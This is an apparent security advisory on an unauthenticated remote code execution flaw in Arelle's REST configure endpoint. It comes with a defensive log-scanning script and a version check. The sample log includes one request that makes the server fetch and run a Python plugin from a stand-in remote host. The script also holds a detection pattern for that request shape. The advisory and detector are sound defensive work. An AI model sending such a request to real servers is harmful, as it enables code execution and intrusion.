Arelle Unauthenticated Remote Code Execution Vulnerability in REST Configure Endpoint
Vulnerability
A remote code execution vulnerability has been identified in Arelle versions prior to 2.39.10. The issue resides in the /rest/configure REST endpoint, which accepts a plugins query parameter and forwards it to the plugin manager without any authentication or authorization. This vulnerability allows attackers to provide a URL pointing to a malicious Python file via the plugins parameter. Consequently, the Arelle web server downloads and executes the attacker-controlled code within the Arelle process, using its privileges.
Impact
Exploitation of this vulnerability allows for unauthenticated remote code execution on the server where Arelle is running.
Remediation
Users can upgrade to Arelle version 2.39.10 or later to address this vulnerability.
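As an added defender-side example (not Arelle's own code), the following script flags access-log requests to `/rest/configure` whose `plugins` parameter carries a remote URL, the request shape described above, and checks whether a reported Arelle version already includes the 2.39.10 fix. The combined-log-format layout, the log lines and the plugin names are constructed assumptions.

```python
# Added example, not Arelle's code: detect /rest/configure requests that load a
# plugin from a URL, and check an Arelle version against the fixed release.
# The log layout (combined log format) and all sample lines are constructed.
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Any scheme-qualified reference inside the plugins value is suspicious,
# whatever separator is used between several plugin names.
REMOTE_REF_RE = re.compile(r'(?i)\b(?:https?|ftp)://\S+')
FIXED_VERSION = (2, 39, 10)   # remediation version named in the advisory


def remote_plugin_refs(target: str) -> list[str]:
    """Remote URLs found in the plugins parameter of a /rest/configure request."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") != "/rest/configure":
        return []
    refs = []
    for value in parse_qs(parts.query).get("plugins", []):  # parse_qs undoes %-encoding
        refs.extend(REMOTE_REF_RE.findall(value))
    return refs


def scan_log(text: str) -> list[dict]:
    """Report each access-log request that asks Arelle to load a plugin from a URL."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line
        urls = remote_plugin_refs(m.group("target"))
        if urls:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "status": int(m.group("status")), "urls": urls})
    return hits


def is_fixed_version(version: str) -> bool:
    """True when the version string is 2.39.10 or later."""
    nums = [int(p) for p in re.findall(r"\d+", version)[:3]]
    return tuple(nums + [0] * (3 - len(nums))) >= FIXED_VERSION


# Constructed sample: a local plugin name, a %-encoded remote URL, an unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2025:12:00:01 +0000] "GET /rest/configure?plugins=localPlugin HTTP/1.1" 200 512
10.0.0.9 - - [10/Mar/2025:12:00:07 +0000] "GET /rest/configure?plugins=http%3A%2F%2F198.51.100.7%2Fp.py HTTP/1.1" 200 128
10.0.0.5 - - [10/Mar/2025:12:00:09 +0000] "GET /rest/about HTTP/1.1" 200 64
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} loaded plugin(s) from {hit['urls']} (HTTP {hit['status']})")
```

Only the second sample line is reported; a request that names a local plugin, or that hits another endpoint, is left alone.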